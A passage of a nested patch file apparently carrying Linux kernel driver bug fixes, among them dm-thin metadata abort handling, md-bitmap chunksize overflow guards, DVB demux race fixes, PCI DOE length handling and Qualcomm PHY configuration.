++	 * because it will be set again in __begin_transaction(). But dm
++	 * pool aborting process really needs to get last transaction's
++	 * root to avoid accessing broken btree.
++	 */
++	pmd->root = le64_to_cpu(disk_super->data_mapping_root);
++	pmd->details_root = le64_to_cpu(disk_super->device_details_root);
++
+ 	__setup_btree_details(pmd);
+ 	dm_bm_unlock(sblock);
+ 
+@@ -776,13 +785,15 @@ static int __create_persistent_data_objects(struct dm_pool_metadata *pmd, bool f
+ 	return r;
+ }
+ 
+-static void __destroy_persistent_data_objects(struct dm_pool_metadata *pmd)
++static void __destroy_persistent_data_objects(struct dm_pool_metadata *pmd,
++					      bool destroy_bm)
+ {
+ 	dm_sm_destroy(pmd->data_sm);
+ 	dm_sm_destroy(pmd->metadata_sm);
+ 	dm_tm_destroy(pmd->nb_tm);
+ 	dm_tm_destroy(pmd->tm);
+-	dm_block_manager_destroy(pmd->bm);
++	if (destroy_bm)
++		dm_block_manager_destroy(pmd->bm);
+ }
+ 
+ static int __begin_transaction(struct dm_pool_metadata *pmd)
+@@ -989,7 +1000,7 @@ int dm_pool_metadata_close(struct dm_pool_metadata *pmd)
+ 	}
+ 	pmd_write_unlock(pmd);
+ 	if (!pmd->fail_io)
+-		__destroy_persistent_data_objects(pmd);
++		__destroy_persistent_data_objects(pmd, true);
+ 
+ 	kfree(pmd);
+ 	return 0;
+@@ -1860,19 +1871,52 @@ static void __set_abort_with_changes_flags(struct dm_pool_metadata *pmd)
+ int dm_pool_abort_metadata(struct dm_pool_metadata *pmd)
+ {
+ 	int r = -EINVAL;
++	struct dm_block_manager *old_bm = NULL, *new_bm = NULL;
++
++	/* fail_io is double-checked with pmd->root_lock held below */
++	if (unlikely(pmd->fail_io))
++		return r;
++
++	/*
++	 * Replacement block manager (new_bm) is created and old_bm destroyed outside of
++	 * pmd root_lock to avoid ABBA deadlock that would result (due to life-cycle of
++	 * shrinker associated with the block manager's bufio client vs pmd root_lock).
++	 * - must take shrinker_rwsem without holding pmd->root_lock
++	 */
++	new_bm = dm_block_manager_create(pmd->bdev, THIN_METADATA_BLOCK_SIZE << SECTOR_SHIFT,
++					 THIN_MAX_CONCURRENT_LOCKS);
+ 
+ 	pmd_write_lock(pmd);
+-	if (pmd->fail_io)
++	if (pmd->fail_io) {
++		pmd_write_unlock(pmd);
+ 		goto out;
++	}
+ 
+ 	__set_abort_with_changes_flags(pmd);
+-	__destroy_persistent_data_objects(pmd);
+-	r = __create_persistent_data_objects(pmd, false);
++	__destroy_persistent_data_objects(pmd, false);
++	old_bm = pmd->bm;
++	if (IS_ERR(new_bm)) {
++		DMERR("could not create block manager during abort");
++		pmd->bm = NULL;
++		r = PTR_ERR(new_bm);
++		goto out_unlock;
++	}
++
++	pmd->bm = new_bm;
++	r = __open_or_format_metadata(pmd, false);
++	if (r) {
++		pmd->bm = NULL;
++		goto out_unlock;
++	}
++	new_bm = NULL;
++out_unlock:
+ 	if (r)
+ 		pmd->fail_io = true;
+-
+-out:
+ 	pmd_write_unlock(pmd);
++	dm_block_manager_destroy(old_bm);
++out:
++	if (new_bm && !IS_ERR(new_bm))
++		dm_block_manager_destroy(new_bm);
+ 
+ 	return r;
+ }
+diff --git a/drivers/md/dm-thin.c b/drivers/md/dm-thin.c
+index e76c96c760a9b..196f82559ad6b 100644
+--- a/drivers/md/dm-thin.c
++++ b/drivers/md/dm-thin.c
+@@ -2889,6 +2889,8 @@ static void __pool_destroy(struct pool *pool)
+ 	dm_bio_prison_destroy(pool->prison);
+ 	dm_kcopyd_client_destroy(pool->copier);
+ 
++	cancel_delayed_work_sync(&pool->waker);
++	cancel_delayed_work_sync(&pool->no_space_timeout);
+ 	if (pool->wq)
+ 		destroy_workqueue(pool->wq);
+ 
+@@ -3540,20 +3542,28 @@ static int pool_preresume(struct dm_target *ti)
+ 	 */
+ 	r = bind_control_target(pool, ti);
+ 	if (r)
+-		return r;
++		goto out;
+ 
+ 	r = maybe_resize_data_dev(ti, &need_commit1);
+ 	if (r)
+-		return r;
++		goto out;
+ 
+ 	r = maybe_resize_metadata_dev(ti, &need_commit2);
+ 	if (r)
+-		return r;
++		goto out;
+ 
+ 	if (need_commit1 || need_commit2)
+ 		(void) commit(pool);
++out:
++	/*
++	 * When a thin-pool is PM_FAIL, it cannot be rebuilt if
++	 * bio is in deferred list. Therefore need to return 0
++	 * to allow pool_resume() to flush IO.
++	 */
++	if (r && get_pool_mode(pool) == PM_FAIL)
++		r = 0;
+ 
+-	return 0;
++	return r;
+ }
+ 
+ static void pool_suspend_active_thins(struct pool *pool)
+diff --git a/drivers/md/md-bitmap.c b/drivers/md/md-bitmap.c
+index 63ece30114e53..e7cc6ba1b657f 100644
+--- a/drivers/md/md-bitmap.c
++++ b/drivers/md/md-bitmap.c
+@@ -486,7 +486,7 @@ void md_bitmap_print_sb(struct bitmap *bitmap)
+ 	sb = kmap_atomic(bitmap->storage.sb_page);
+ 	pr_debug("%s: bitmap file superblock:\n", bmname(bitmap));
+ 	pr_debug("         magic: %08x\n", le32_to_cpu(sb->magic));
+-	pr_debug("       version: %d\n", le32_to_cpu(sb->version));
++	pr_debug("       version: %u\n", le32_to_cpu(sb->version));
+ 	pr_debug("          uuid: %08x.%08x.%08x.%08x\n",
+ 		 le32_to_cpu(*(__le32 *)(sb->uuid+0)),
+ 		 le32_to_cpu(*(__le32 *)(sb->uuid+4)),
+@@ -497,11 +497,11 @@ void md_bitmap_print_sb(struct bitmap *bitmap)
+ 	pr_debug("events cleared: %llu\n",
+ 		 (unsigned long long) le64_to_cpu(sb->events_cleared));
+ 	pr_debug("         state: %08x\n", le32_to_cpu(sb->state));
+-	pr_debug("     chunksize: %d B\n", le32_to_cpu(sb->chunksize));
+-	pr_debug("  daemon sleep: %ds\n", le32_to_cpu(sb->daemon_sleep));
++	pr_debug("     chunksize: %u B\n", le32_to_cpu(sb->chunksize));
++	pr_debug("  daemon sleep: %us\n", le32_to_cpu(sb->daemon_sleep));
+ 	pr_debug("     sync size: %llu KB\n",
+ 		 (unsigned long long)le64_to_cpu(sb->sync_size)/2);
+-	pr_debug("max write behind: %d\n", le32_to_cpu(sb->write_behind));
++	pr_debug("max write behind: %u\n", le32_to_cpu(sb->write_behind));
+ 	kunmap_atomic(sb);
+ }
+ 
+@@ -2105,7 +2105,8 @@ int md_bitmap_resize(struct bitmap *bitmap, sector_t blocks,
+ 			bytes = DIV_ROUND_UP(chunks, 8);
+ 			if (!bitmap->mddev->bitmap_info.external)
+ 				bytes += sizeof(bitmap_super_t);
+-		} while (bytes > (space << 9));
++		} while (bytes > (space << 9) && (chunkshift + BITMAP_BLOCK_SHIFT) <
++			(BITS_PER_BYTE * sizeof(((bitmap_super_t *)0)->chunksize) - 1));
+ 	} else
+ 		chunkshift = ffz(~chunksize) - BITMAP_BLOCK_SHIFT;
+ 
+@@ -2150,7 +2151,7 @@ int md_bitmap_resize(struct bitmap *bitmap, sector_t blocks,
+ 	bitmap->counts.missing_pages = pages;
+ 	bitmap->counts.chunkshift = chunkshift;
+ 	bitmap->counts.chunks = chunks;
+-	bitmap->mddev->bitmap_info.chunksize = 1 << (chunkshift +
++	bitmap->mddev->bitmap_info.chunksize = 1UL << (chunkshift +
+ 						     BITMAP_BLOCK_SHIFT);
+ 
+ 	blocks = min(old_counts.chunks << old_counts.chunkshift,
+@@ -2176,8 +2177,8 @@ int md_bitmap_resize(struct bitmap *bitmap, sector_t blocks,
+ 				bitmap->counts.missing_pages = old_counts.pages;
+ 				bitmap->counts.chunkshift = old_counts.chunkshift;
+ 				bitmap->counts.chunks = old_counts.chunks;
+-				bitmap->mddev->bitmap_info.chunksize = 1 << (old_counts.chunkshift +
+-									     BITMAP_BLOCK_SHIFT);
++				bitmap->mddev->bitmap_info.chunksize =
++					1UL << (old_counts.chunkshift + BITMAP_BLOCK_SHIFT);
+ 				blocks = old_counts.chunks << old_counts.chunkshift;
+ 				pr_warn("Could not pre-allocate in-memory bitmap for cluster raid\n");
+ 				break;
+@@ -2537,6 +2538,9 @@ chunksize_store(struct mddev *mddev, const char *buf, size_t len)
+ 	if (csize < 512 ||
+ 	    !is_power_of_2(csize))
+ 		return -EINVAL;
++	if (BITS_PER_LONG > 32 && csize >= (1ULL << (BITS_PER_BYTE *
++		sizeof(((bitmap_super_t *)0)->chunksize))))
++		return -EOVERFLOW;
+ 	mddev->bitmap_info.chunksize = csize;
+ 	return len;
+ }
+diff --git a/drivers/media/dvb-core/dmxdev.c b/drivers/media/dvb-core/dmxdev.c
+index f6ee678107d37..9ce5f010de3f8 100644
+--- a/drivers/media/dvb-core/dmxdev.c
++++ b/drivers/media/dvb-core/dmxdev.c
+@@ -790,6 +790,11 @@ static int dvb_demux_open(struct inode *inode, struct file *file)
+ 	if (mutex_lock_interruptible(&dmxdev->mutex))
+ 		return -ERESTARTSYS;
+ 
++	if (dmxdev->exit) {
++		mutex_unlock(&dmxdev->mutex);
++		return -ENODEV;
++	}
++
+ 	for (i = 0; i < dmxdev->filternum; i++)
+ 		if (dmxdev->filter[i].state == DMXDEV_STATE_FREE)
+ 			break;
+@@ -1448,7 +1453,10 @@ EXPORT_SYMBOL(dvb_dmxdev_init);
+ 
+ void dvb_dmxdev_release(struct dmxdev *dmxdev)
+ {
++	mutex_lock(&dmxdev->mutex);
+ 	dmxdev->exit = 1;
++	mutex_unlock(&dmxdev->mutex);
++
+ 	if (dmxdev->dvbdev->users > 1) {
+ 		wait_event(dmxdev->dvbdev->wait_queue,
+ 				dmxdev->dvbdev->users == 1);
+diff --git a/drivers/media/dvb-core/dvbdev.c b/drivers/media/dvb-core/dvbdev.c
+index 9934728734af9..a31d52cb6d62c 100644
+--- a/drivers/media/dvb-core/dvbdev.c
++++ b/drivers/media/dvb-core/dvbdev.c
+@@ -335,6 +335,7 @@ static int dvb_create_media_entity(struct dvb_device *dvbdev,
+ 				       GFP_KERNEL);
+ 		if (!dvbdev->pads) {
+ 			kfree(dvbdev->entity);
++			dvbdev->entity = NULL;
+ 			return -ENOMEM;
+ 		}
+ 	}
+diff --git a/drivers/media/dvb-frontends/stv0288.c b/drivers/media/dvb-frontends/stv0288.c
+index 3d54a0ec86afd..3ae1f3a2f1420 100644
+--- a/drivers/media/dvb-frontends/stv0288.c
++++ b/drivers/media/dvb-frontends/stv0288.c
+@@ -440,9 +440,8 @@ static int stv0288_set_frontend(struct dvb_frontend *fe)
+ 	struct stv0288_state *state = fe->demodulator_priv;
+ 	struct dtv_frontend_properties *c = &fe->dtv_property_cache;
+ 
+-	char tm;
+-	unsigned char tda[3];
+-	u8 reg, time_out = 0;
++	u8 tda[3], reg, time_out = 0;
++	s8 tm;
+ 
+ 	dprintk("%s : FE_SET_FRONTEND\n", __func__);
+ 
+diff --git a/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_ctrl.c b/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_ctrl.c
+index 72d70984e99a6..6d3c92045c05f 100644
+--- a/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_ctrl.c
++++ b/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_ctrl.c
+@@ -468,8 +468,10 @@ void s5p_mfc_close_mfc_inst(struct s5p_mfc_dev *dev, struct s5p_mfc_ctx *ctx)
+ 	s5p_mfc_hw_call(dev->mfc_ops, try_run, dev);
+ 	/* Wait until instance is returned or timeout occurred */
+ 	if (s5p_mfc_wait_for_done_ctx(ctx,
+-				S5P_MFC_R2H_CMD_CLOSE_INSTANCE_RET, 0))
++				S5P_MFC_R2H_CMD_CLOSE_INSTANCE_RET, 0)){
++		clear_work_bit_irqsave(ctx);
+ 		mfc_err("Err returning instance\n");
++	}
+ 
+ 	/* Free resources */
+ 	s5p_mfc_hw_call(dev->mfc_ops, release_codec_buffers, ctx);
+diff --git a/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_enc.c b/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_enc.c
+index b65e506665af7..f62703cebb77c 100644
+--- a/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_enc.c
++++ b/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_enc.c
+@@ -1218,6 +1218,7 @@ static int enc_post_frame_start(struct s5p_mfc_ctx *ctx)
+ 	unsigned long mb_y_addr, mb_c_addr;
+ 	int slice_type;
+ 	unsigned int strm_size;
++	bool src_ready;
+ 
+ 	slice_type = s5p_mfc_hw_call(dev->mfc_ops, get_enc_slice_type, dev);
+ 	strm_size = s5p_mfc_hw_call(dev->mfc_ops, get_enc_strm_size, dev);
+@@ -1257,7 +1258,8 @@ static int enc_post_frame_start(struct s5p_mfc_ctx *ctx)
+ 			}
+ 		}
+ 	}
+-	if ((ctx->src_queue_cnt > 0) && (ctx->state == MFCINST_RUNNING)) {
++	if (ctx->src_queue_cnt > 0 && (ctx->state == MFCINST_RUNNING ||
++				       ctx->state == MFCINST_FINISHING)) {
+ 		mb_entry = list_entry(ctx->src_queue.next, struct s5p_mfc_buf,
+ 									list);
+ 		if (mb_entry->flags & MFC_BUF_FLAG_USED) {
+@@ -1288,7 +1290,13 @@ static int enc_post_frame_start(struct s5p_mfc_ctx *ctx)
+ 		vb2_set_plane_payload(&mb_entry->b->vb2_buf, 0, strm_size);
+ 		vb2_buffer_done(&mb_entry->b->vb2_buf, VB2_BUF_STATE_DONE);
+ 	}
+-	if ((ctx->src_queue_cnt == 0) || (ctx->dst_queue_cnt == 0))
++
++	src_ready = true;
++	if (ctx->state == MFCINST_RUNNING && ctx->src_queue_cnt == 0)
++		src_ready = false;
++	if (ctx->state == MFCINST_FINISHING && ctx->ref_queue_cnt == 0)
++		src_ready = false;
++	if (!src_ready || ctx->dst_queue_cnt == 0)
+ 		clear_work_bit(ctx);
+ 
+ 	return 0;
+diff --git a/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_opr_v6.c b/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_opr_v6.c
+index 8227004f67469..c0df5ac9fcff2 100644
+--- a/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_opr_v6.c
++++ b/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_opr_v6.c
+@@ -1060,7 +1060,7 @@ static int s5p_mfc_set_enc_params_h264(struct s5p_mfc_ctx *ctx)
+ 	}
+ 
+ 	/* aspect ratio VUI */
+-	readl(mfc_regs->e_h264_options);
++	reg = readl(mfc_regs->e_h264_options);
+ 	reg &= ~(0x1 << 5);
+ 	reg |= ((p_h264->vui_sar & 0x1) << 5);
+ 	writel(reg, mfc_regs->e_h264_options);
+@@ -1083,7 +1083,7 @@ static int s5p_mfc_set_enc_params_h264(struct s5p_mfc_ctx *ctx)
+ 
+ 	/* intra picture period for H.264 open GOP */
+ 	/* control */
+-	readl(mfc_regs->e_h264_options);
++	reg = readl(mfc_regs->e_h264_options);
+ 	reg &= ~(0x1 << 4);
+ 	reg |= ((p_h264->open_gop & 0x1) << 4);
+ 	writel(reg, mfc_regs->e_h264_options);
+@@ -1097,23 +1097,23 @@ static int s5p_mfc_set_enc_params_h264(struct s5p_mfc_ctx *ctx)
+ 	}
+ 
+ 	/* 'WEIGHTED_BI_PREDICTION' for B is disable */
+-	readl(mfc_regs->e_h264_options);
++	reg = readl(mfc_regs->e_h264_options);
+ 	reg &= ~(0x3 << 9);
+ 	writel(reg, mfc_regs->e_h264_options);
+ 
+ 	/* 'CONSTRAINED_INTRA_PRED_ENABLE' is disable */
+-	readl(mfc_regs->e_h264_options);
++	reg = readl(mfc_regs->e_h264_options);
+ 	reg &= ~(0x1 << 14);
+ 	writel(reg, mfc_regs->e_h264_options);
+ 
+ 	/* ASO */
+-	readl(mfc_regs->e_h264_options);
++	reg = readl(mfc_regs->e_h264_options);
+ 	reg &= ~(0x1 << 6);
+ 	reg |= ((p_h264->aso & 0x1) << 6);
+ 	writel(reg, mfc_regs->e_h264_options);
+ 
+ 	/* hier qp enable */
+-	readl(mfc_regs->e_h264_options);
++	reg = readl(mfc_regs->e_h264_options);
+ 	reg &= ~(0x1 << 8);
+ 	reg |= ((p_h264->open_gop & 0x1) << 8);
+ 	writel(reg, mfc_regs->e_h264_options);
+@@ -1134,7 +1134,7 @@ static int s5p_mfc_set_enc_params_h264(struct s5p_mfc_ctx *ctx)
+ 	writel(reg, mfc_regs->e_h264_num_t_layer);
+ 
+ 	/* frame packing SEI generation */
+-	readl(mfc_regs->e_h264_options);
++	reg = readl(mfc_regs->e_h264_options);
+ 	reg &= ~(0x1 << 25);
+ 	reg |= ((p_h264->sei_frame_packing & 0x1) << 25);
+ 	writel(reg, mfc_regs->e_h264_options);
+diff --git a/drivers/mmc/host/sdhci-sprd.c b/drivers/mmc/host/sdhci-sprd.c
+index bec3f9e3cd3fa..525f979e2a974 100644
+--- a/drivers/mmc/host/sdhci-sprd.c
++++ b/drivers/mmc/host/sdhci-sprd.c
+@@ -228,13 +228,15 @@ static inline void _sdhci_sprd_set_clock(struct sdhci_host *host,
+ 	div = ((div & 0x300) >> 2) | ((div & 0xFF) << 8);
+ 	sdhci_enable_clk(host, div);
+ 
+-	/* enable auto gate sdhc_enable_auto_gate */
+-	val = sdhci_readl(host, SDHCI_SPRD_REG_32_BUSY_POSI);
+-	mask = SDHCI_SPRD_BIT_OUTR_CLK_AUTO_EN |
+-	       SDHCI_SPRD_BIT_INNR_CLK_AUTO_EN;
+-	if (mask != (val & mask)) {
+-		val |= mask;
+-		sdhci_writel(host, val, SDHCI_SPRD_REG_32_BUSY_POSI);
++	/* Enable CLK_AUTO when the clock is greater than 400K. */
++	if (clk > 400000) {
++		val = sdhci_readl(host, SDHCI_SPRD_REG_32_BUSY_POSI);
++		mask = SDHCI_SPRD_BIT_OUTR_CLK_AUTO_EN |
++			SDHCI_SPRD_BIT_INNR_CLK_AUTO_EN;
++		if (mask != (val & mask)) {
++			val |= mask;
++			sdhci_writel(host, val, SDHCI_SPRD_REG_32_BUSY_POSI);
++		}
+ 	}
+ }
+ 
+diff --git a/drivers/mtd/spi-nor/core.c b/drivers/mtd/spi-nor/core.c
+index 0cf1a1797ea32..2e0655c0b606f 100644
+--- a/drivers/mtd/spi-nor/core.c
++++ b/drivers/mtd/spi-nor/core.c
+@@ -1184,6 +1184,8 @@ spi_nor_find_best_erase_type(const struct spi_nor_erase_map *map,
+ 			continue;
+ 
+ 		erase = &map->erase_type[i];
++		if (!erase->size)
++			continue;
+ 
+ 		/* Alignment is not mandatory for overlaid regions */
+ 		if (region->offset & SNOR_OVERLAID_REGION &&
+diff --git a/drivers/mtd/spi-nor/gigadevice.c b/drivers/mtd/spi-nor/gigadevice.c
+index 119b38e6fc2a3..d57ddaf1525b3 100644
+--- a/drivers/mtd/spi-nor/gigadevice.c
++++ b/drivers/mtd/spi-nor/gigadevice.c
+@@ -8,19 +8,29 @@
+ 
+ #include "core.h"
+ 
+-static void gd25q256_default_init(struct spi_nor *nor)
++static int
++gd25q256_post_bfpt(struct spi_nor *nor,
++		   const struct sfdp_parameter_header *bfpt_header,
++		   const struct sfdp_bfpt *bfpt)
+ {
+ 	/*
+-	 * Some manufacturer like GigaDevice may use different
+-	 * bit to set QE on different memories, so the MFR can't
+-	 * indicate the quad_enable method for this case, we need
+-	 * to set it in the default_init fixup hook.
++	 * GD25Q256C supports the first version of JESD216 which does not define
++	 * the Quad Enable methods. Overwrite the default Quad Enable method.
++	 *
++	 * GD25Q256 GENERATION | SFDP MAJOR VERSION | SFDP MINOR VERSION
++	 *      GD25Q256C      | SFDP_JESD216_MAJOR | SFDP_JESD216_MINOR
++	 *      GD25Q256D      | SFDP_JESD216_MAJOR | SFDP_JESD216B_MINOR
++	 *      GD25Q256E      | SFDP_JESD216_MAJOR | SFDP_JESD216B_MINOR
+ 	 */
+-	nor->params->quad_enable = spi_nor_sr1_bit6_quad_enable;
++	if (bfpt_header->major == SFDP_JESD216_MAJOR &&
++	    bfpt_header->minor == SFDP_JESD216_MINOR)
++		nor->params->quad_enable = spi_nor_sr1_bit6_quad_enable;
++
++	return 0;
+ }
+ 
+ static const struct spi_nor_fixups gd25q256_fixups = {
+-	.default_init = gd25q256_default_init,
++	.post_bfpt = gd25q256_post_bfpt,
+ };
+ 
+ static const struct flash_info gigadevice_nor_parts[] = {
+diff --git a/drivers/net/ethernet/renesas/ravb_main.c b/drivers/net/ethernet/renesas/ravb_main.c
+index 33f723a9f471b..b4e0fc7f65bdf 100644
+--- a/drivers/net/ethernet/renesas/ravb_main.c
++++ b/drivers/net/ethernet/renesas/ravb_main.c
+@@ -2903,12 +2903,12 @@ static int ravb_remove(struct platform_device *pdev)
+ 			  priv->desc_bat_dma);
+ 	/* Set reset mode */
+ 	ravb_write(ndev, CCC_OPC_RESET, CCC);
+-	pm_runtime_put_sync(&pdev->dev);
+ 	unregister_netdev(ndev);
+ 	if (info->nc_queues)
+ 		netif_napi_del(&priv->napi[RAVB_NC]);
+ 	netif_napi_del(&priv->napi[RAVB_BE]);
+ 	ravb_mdio_release(priv);
++	pm_runtime_put_sync(&pdev->dev);
+ 	pm_runtime_disable(&pdev->dev);
+ 	reset_control_assert(priv->rstc);
+ 	free_netdev(ndev);
+diff --git a/drivers/net/wireless/microchip/wilc1000/sdio.c b/drivers/net/wireless/microchip/wilc1000/sdio.c
+index 7390f94cd4ca2..a05bda7b9a3ba 100644
+--- a/drivers/net/wireless/microchip/wilc1000/sdio.c
++++ b/drivers/net/wireless/microchip/wilc1000/sdio.c
+@@ -20,6 +20,7 @@ static const struct sdio_device_id wilc_sdio_ids[] = {
+ 	{ SDIO_DEVICE(SDIO_VENDOR_ID_MICROCHIP_WILC, SDIO_DEVICE_ID_MICROCHIP_WILC1000) },
+ 	{ },
+ };
++MODULE_DEVICE_TABLE(sdio, wilc_sdio_ids);
+ 
+ #define WILC_SDIO_BLOCK_SIZE 512
+ 
+diff --git a/drivers/of/kexec.c b/drivers/of/kexec.c
+index e6c01db393f95..f26d2ba8a3715 100644
+--- a/drivers/of/kexec.c
++++ b/drivers/of/kexec.c
+@@ -281,7 +281,7 @@ void *of_kexec_alloc_and_setup_fdt(const struct kimage *image,
+ 				   const char *cmdline, size_t extra_fdt_size)
+ {
+ 	void *fdt;
+-	int ret, chosen_node;
++	int ret, chosen_node, len;
+ 	const void *prop;
+ 	size_t fdt_size;
+ 
+@@ -324,19 +324,19 @@ void *of_kexec_alloc_and_setup_fdt(const struct kimage *image,
+ 		goto out;
+ 
+ 	/* Did we boot using an initrd? */
+-	prop = fdt_getprop(fdt, chosen_node, "linux,initrd-start", NULL);
++	prop = fdt_getprop(fdt, chosen_node, "linux,initrd-start", &len);
+ 	if (prop) {
+ 		u64 tmp_start, tmp_end, tmp_size;
+ 
+-		tmp_start = fdt64_to_cpu(*((const fdt64_t *) prop));
++		tmp_start = of_read_number(prop, len / 4);
+ 
+-		prop = fdt_getprop(fdt, chosen_node, "linux,initrd-end", NULL);
++		prop = fdt_getprop(fdt, chosen_node, "linux,initrd-end", &len);
+ 		if (!prop) {
+ 			ret = -EINVAL;
+ 			goto out;
+ 		}
+ 
+-		tmp_end = fdt64_to_cpu(*((const fdt64_t *) prop));
++		tmp_end = of_read_number(prop, len / 4);
+ 
+ 		/*
+ 		 * kexec reserves exact initrd size, while firmware may
+diff --git a/drivers/parisc/led.c b/drivers/parisc/led.c
+index d4be9d2ee74d9..8bdc5e043831c 100644
+--- a/drivers/parisc/led.c
++++ b/drivers/parisc/led.c
+@@ -137,6 +137,9 @@ static int start_task(void)
+ 
+ 	/* Create the work queue and queue the LED task */
+ 	led_wq = create_singlethread_workqueue("led_wq");	
++	if (!led_wq)
++		return -ENOMEM;
++
+ 	queue_delayed_work(led_wq, &led_task, 0);
+ 
+ 	return 0;
+diff --git a/drivers/pci/doe.c b/drivers/pci/doe.c
+index e402f05068a53..66d9ab2886468 100644
+--- a/drivers/pci/doe.c
++++ b/drivers/pci/doe.c
+@@ -29,6 +29,9 @@
+ #define PCI_DOE_FLAG_CANCEL	0
+ #define PCI_DOE_FLAG_DEAD	1
+ 
++/* Max data object length is 2^18 dwords */
++#define PCI_DOE_MAX_LENGTH	(1 << 18)
++
+ /**
+  * struct pci_doe_mb - State for a single DOE mailbox
+  *
+@@ -107,6 +110,7 @@ static int pci_doe_send_req(struct pci_doe_mb *doe_mb,
+ {
+ 	struct pci_dev *pdev = doe_mb->pdev;
+ 	int offset = doe_mb->cap_offset;
++	size_t length;
+ 	u32 val;
+ 	int i;
+ 
+@@ -123,15 +127,20 @@ static int pci_doe_send_req(struct pci_doe_mb *doe_mb,
+ 	if (FIELD_GET(PCI_DOE_STATUS_ERROR, val))
+ 		return -EIO;
+ 
++	/* Length is 2 DW of header + length of payload in DW */
++	length = 2 + task->request_pl_sz / sizeof(u32);
++	if (length > PCI_DOE_MAX_LENGTH)
++		return -EIO;
++	if (length == PCI_DOE_MAX_LENGTH)
++		length = 0;
++
+ 	/* Write DOE Header */
+ 	val = FIELD_PREP(PCI_DOE_DATA_OBJECT_HEADER_1_VID, task->prot.vid) |
+ 		FIELD_PREP(PCI_DOE_DATA_OBJECT_HEADER_1_TYPE, task->prot.type);
+ 	pci_write_config_dword(pdev, offset + PCI_DOE_WRITE, val);
+-	/* Length is 2 DW of header + length of payload in DW */
+ 	pci_write_config_dword(pdev, offset + PCI_DOE_WRITE,
+ 			       FIELD_PREP(PCI_DOE_DATA_OBJECT_HEADER_2_LENGTH,
+-					  2 + task->request_pl_sz /
+-						sizeof(u32)));
++					  length));
+ 	for (i = 0; i < task->request_pl_sz / sizeof(u32); i++)
+ 		pci_write_config_dword(pdev, offset + PCI_DOE_WRITE,
+ 				       task->request_pl[i]);
+@@ -178,7 +187,10 @@ static int pci_doe_recv_resp(struct pci_doe_mb *doe_mb, struct pci_doe_task *tas
+ 	pci_write_config_dword(pdev, offset + PCI_DOE_READ, 0);
+ 
+ 	length = FIELD_GET(PCI_DOE_DATA_OBJECT_HEADER_2_LENGTH, val);
+-	if (length > SZ_1M || length < 2)
++	/* A value of 0x0 indicates max data object length */
++	if (!length)
++		length = PCI_DOE_MAX_LENGTH;
++	if (length < 2)
+ 		return -EIO;
+ 
+ 	/* First 2 dwords have already been read */
+diff --git a/drivers/pci/pci-sysfs.c b/drivers/pci/pci-sysfs.c
+index 0a2eeb82cebde..ba38fc47d35e9 100644
+--- a/drivers/pci/pci-sysfs.c
++++ b/drivers/pci/pci-sysfs.c
+@@ -1175,11 +1175,9 @@ static int pci_create_attr(struct pci_dev *pdev, int num, int write_combine)
+ 
+ 	sysfs_bin_attr_init(res_attr);
+ 	if (write_combine) {
+-		pdev->res_attr_wc[num] = res_attr;
+ 		sprintf(res_attr_name, "resource%d_wc", num);
+ 		res_attr->mmap = pci_mmap_resource_wc;
+ 	} else {
+-		pdev->res_attr[num] = res_attr;
+ 		sprintf(res_attr_name, "resource%d", num);
+ 		if (pci_resource_flags(pdev, num) & IORESOURCE_IO) {
+ 			res_attr->read = pci_read_resource_io;
+@@ -1197,10 +1195,17 @@ static int pci_create_attr(struct pci_dev *pdev, int num, int write_combine)
+ 	res_attr->size = pci_resource_len(pdev, num);
+ 	res_attr->private = (void *)(unsigned long)num;
+ 	retval = sysfs_create_bin_file(&pdev->dev.kobj, res_attr);
+-	if (retval)
++	if (retval) {
+ 		kfree(res_attr);
++		return retval;
++	}
++
++	if (write_combine)
++		pdev->res_attr_wc[num] = res_attr;
++	else
++		pdev->res_attr[num] = res_attr;
+ 
+-	return retval;
++	return 0;
+ }
+ 
+ /**
+diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
+index 2127aba3550b5..ab615ab4e4409 100644
+--- a/drivers/pci/pci.c
++++ b/drivers/pci/pci.c
+@@ -6447,6 +6447,8 @@ bool pci_device_is_present(struct pci_dev *pdev)
+ {
+ 	u32 v;
+ 
++	/* Check PF if pdev is a VF, since VF Vendor/Device IDs are 0xffff */
++	pdev = pci_physfn(pdev);
+ 	if (pci_dev_is_disconnected(pdev))
+ 		return false;
+ 	return pci_bus_read_dev_vendor_id(pdev->bus, pdev->devfn, &v, 0);
+diff --git a/drivers/phy/qualcomm/phy-qcom-qmp-combo.c b/drivers/phy/qualcomm/phy-qcom-qmp-combo.c
+index ba9d761ec49a7..91f8ee79000df 100644
+--- a/drivers/phy/qualcomm/phy-qcom-qmp-combo.c
++++ b/drivers/phy/qualcomm/phy-qcom-qmp-combo.c
+@@ -1121,9 +1121,46 @@ static const struct qmp_phy_cfg sdm845_usb3phy_cfg = {
+ 	.pwrdn_delay_max	= POWER_DOWN_DELAY_US_MAX,
+ };
+ 
++static const struct qmp_phy_cfg sdm845_dpphy_cfg = {
++	.type			= PHY_TYPE_DP,
++	.lanes			= 2,
++
++	.serdes_tbl		= qmp_v3_dp_serdes_tbl,
++	.serdes_tbl_num		= ARRAY_SIZE(qmp_v3_dp_serdes_tbl),
++	.tx_tbl			= qmp_v3_dp_tx_tbl,
++	.tx_tbl_num		= ARRAY_SIZE(qmp_v3_dp_tx_tbl),
++
++	.serdes_tbl_rbr		= qmp_v3_dp_serdes_tbl_rbr,
++	.serdes_tbl_rbr_num	= ARRAY_SIZE(qmp_v3_dp_serdes_tbl_rbr),
++	.serdes_tbl_hbr		= qmp_v3_dp_serdes_tbl_hbr,
++	.serdes_tbl_hbr_num	= ARRAY_SIZE(qmp_v3_dp_serdes_tbl_hbr),
++	.serdes_tbl_hbr2	= qmp_v3_dp_serdes_tbl_hbr2,
++	.serdes_tbl_hbr2_num	= ARRAY_SIZE(qmp_v3_dp_serdes_tbl_hbr2),
++	.serdes_tbl_hbr3	= qmp_v3_dp_serdes_tbl_hbr3,
++	.serdes_tbl_hbr3_num	= ARRAY_SIZE(qmp_v3_dp_serdes_tbl_hbr3),
++
